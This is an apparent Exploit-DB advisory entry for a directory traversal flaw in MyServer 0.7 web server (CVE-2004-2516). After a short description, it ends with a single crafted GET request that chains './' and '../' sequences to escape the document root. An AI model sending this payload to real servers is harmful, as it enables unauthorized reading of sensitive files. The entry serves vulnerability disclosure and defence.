myserver 0.7 - Directory Traversal Vulnerability

2004-09-15T00:00:00
ID EDB-ID:24600
Type exploitdb
Reporter scrap
Modified 2004-09-15T00:00:00

Description

MyServer 0.7 Directory Traversal Vulnerability. CVE-2004-2516. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/11189/info

MyServer is reported prone to a remote directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This vulnerability results in improper access to potentially sensitive files located outside of the document root of the web server. 

MyServer version 0.7 is reportedly affected by this issue, however, other versions may be vulnerable as well.

"GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"